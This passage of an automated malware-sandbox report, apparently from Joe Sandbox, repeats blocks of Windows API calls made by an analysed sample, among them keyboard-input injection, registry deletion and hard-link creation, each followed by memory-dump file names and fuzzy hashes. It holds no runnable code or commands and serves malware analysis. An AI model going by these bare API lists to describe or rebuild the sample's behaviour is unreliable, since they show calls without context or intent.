                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F23BFB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                                      • Opcode ID: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
                                                                                                                                                                                                                                                      • Instruction ID: 024d6751b73f3ae5c7b776fe9784117c70692bae4526b2726fe7161c2cceac55
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AD0A7B4A407669FD7205F60FC08603FAF4AB12328B10841EEC49E2250D7B4D480EE11
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1e3500991697298638e4b6126a9ca95621ed30baf5082d0c82bce4dc77d8d262
                                                                                                                                                                                                                                                      • Instruction ID: 71c595fe3d085fe9732a8273d39d636db852b1b4b159b0acb3567e57a6a952df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e3500991697298638e4b6126a9ca95621ed30baf5082d0c82bce4dc77d8d262
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37C16C75A0021AEFCB14CF94C884BBEB7B5FF48704F209599EA85AB252D730DE41DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F1AAB4
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F1AABF
                                                                                                                                                                                                                                                        • Part of subcall function 00F00213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0027B
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F1AACA
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F1AD9D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                                                                                                      • Opcode ID: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
                                                                                                                                                                                                                                                      • Instruction ID: 4e0ab1b6eaf24f528e3769816adee79b079eaf241284299a4816920a940cfe33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BA14735604B019FCB10DF14C985B5AB7E4BF88320F04444DFA9AAB3A2CB31ED41DB86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2808897238-0
                                                                                                                                                                                                                                                      • Opcode ID: a70569230a2dde5cd0d1f7a80af29803434ae06e6c553de4b508da8387776891
                                                                                                                                                                                                                                                      • Instruction ID: c6405272a6336ae482897bfc11dbfa334ba45c48a0cec8dc63b43590f2672add
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70569230a2dde5cd0d1f7a80af29803434ae06e6c553de4b508da8387776891
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8851BA34A0530A9BDB24AF65D491B7EB3E9EF55314F20A81FE6D6EB2D3DB3098418701
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(011471B0,?), ref: 00F2C544
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 00F2C574
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F2C5DA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                                      • Opcode ID: 3eb17eaa742934907e3c68db40ad4d64101cca202ea1c142c7b5dd4bef754df1
                                                                                                                                                                                                                                                      • Instruction ID: 99443323b03a8a83fecefe31dca0d96e4743eb41644b4d142b0a71dde0e55627
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb17eaa742934907e3c68db40ad4d64101cca202ea1c142c7b5dd4bef754df1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51515E75900118EFCF20DF68D881AAE7BB6FB55320F148259F95997290D734ED81EB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EFC462
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EFC49C
                                                                                                                                                                                                                                                        • Part of subcall function 00EFC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EFC753
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EFC505
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EFC55A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                                                                                      • Opcode ID: 5be8b21a3d04f22af4f80c8b5ad09f68784fa82181f3ad5598d06377aa236c52
                                                                                                                                                                                                                                                      • Instruction ID: 1a0f4921e5af301debb824f99546e195acb325c72444381c9a3bf30ce14d56e6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be8b21a3d04f22af4f80c8b5ad09f68784fa82181f3ad5598d06377aa236c52
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941E47160060CABDF11DF54C955FFE7BF9AF48704F201059FA09B7281DB71AA4A8BA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F03966
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F03982
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00F039EF
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00F03A4D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                      • Opcode ID: d72e2c073d6738172006a9f7dcdcdb4f00446ce888065eafe74a59429d2fba7c
                                                                                                                                                                                                                                                      • Instruction ID: 8968debab7dccb28523c900cc86468b709ec9d73aaeac55ad3e18d8e6c50d510
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d72e2c073d6738172006a9f7dcdcdb4f00446ce888065eafe74a59429d2fba7c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D412770F44208AEEF208B64CC09BFDBBBE9B55320F04011AE4C1922C1C7B88E85F761
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F0E742
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F0E768
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F0E78D
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F0E7B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                                      • Opcode ID: 4468b05e2928fe7073a1036074f44a7ef5027846f0ba4d1d35a5d29606e961b2
                                                                                                                                                                                                                                                      • Instruction ID: 102353ad017e8948e22b1c488a36f34c8e1715deb600e4b2533f79e8df3834ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4468b05e2928fe7073a1036074f44a7ef5027846f0ba4d1d35a5d29606e961b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17414739600610DFCF11EF18C544A5DBBE5FF99720B098498E916AB3A2CB75FD01EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F2B5D1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                                                                      • Opcode ID: 518f14f71712557a1c4ef348099c02bf4702407b883c1a57a4bebdd907cfd528
                                                                                                                                                                                                                                                      • Instruction ID: 5d3344422e142ebb140a949de5067504daf194ebb4d07cc562911b03795764cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 518f14f71712557a1c4ef348099c02bf4702407b883c1a57a4bebdd907cfd528
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531C775A01128BFEF209F58EC86FE87BA5EB06320F584551FE51DA2E1D730E940BB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00F2D807
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F2D87D
                                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,00F2ED5A), ref: 00F2D88D
                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00F2D8FE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                                                                                                      • Opcode ID: 3ac1142b930bf0f975c3a176ec01718fd0579dfe71bbde014ae26b2a7bd352c2
                                                                                                                                                                                                                                                      • Instruction ID: 09f230919393357ce8257e6dadeb2efd4665e5fa158cb48034ce4458ff67f915
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac1142b930bf0f975c3a176ec01718fd0579dfe71bbde014ae26b2a7bd352c2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB41AD75E00228DFCB15DF58E884BE97BF5FF49361F1882A9E8549B260D730E945EB40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F03AB8
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F03AD4
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00F03B34
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F03B92
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c9787c1bec99739b4595706d189ccac8c8dc92c1192712d32d7605ab4e0bf4f
                                                                                                                                                                                                                                                      • Instruction ID: 6318a2b5bf40cb34a9b4877af606e4bdd87ce9f72436ea7570aa578f7b720869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c9787c1bec99739b4595706d189ccac8c8dc92c1192712d32d7605ab4e0bf4f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D31F8B1E40258AEEF218B64CC197FD7BAD9B96328F04015AE881931D1C7788F45F761
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EF4038
                                                                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00EF4066
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EF4094
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EF40CA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                                                                      • Opcode ID: f64fce4fa6982de990a43385436a15b4942262b28054c0a5c19cce497e5489b4
                                                                                                                                                                                                                                                      • Instruction ID: c63a6f35c91fea1e3ed68f57fd1f7eb91f0f41035747f459ecf5d9ea3ee56733
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f64fce4fa6982de990a43385436a15b4942262b28054c0a5c19cce497e5489b4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C231EF7060020AAFDB219F24C844BBB7BE5BF40314F155028EB64AB0E1EB31D890DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00F27CB9
                                                                                                                                                                                                                                                        • Part of subcall function 00F05F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F05F6F
                                                                                                                                                                                                                                                        • Part of subcall function 00F05F55: GetCurrentThreadId.KERNEL32 ref: 00F05F76
                                                                                                                                                                                                                                                        • Part of subcall function 00F05F55: AttachThreadInput.USER32(00000000,?,00F0781F), ref: 00F05F7D
                                                                                                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 00F27CCA
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00F27D03
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00F27D09
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
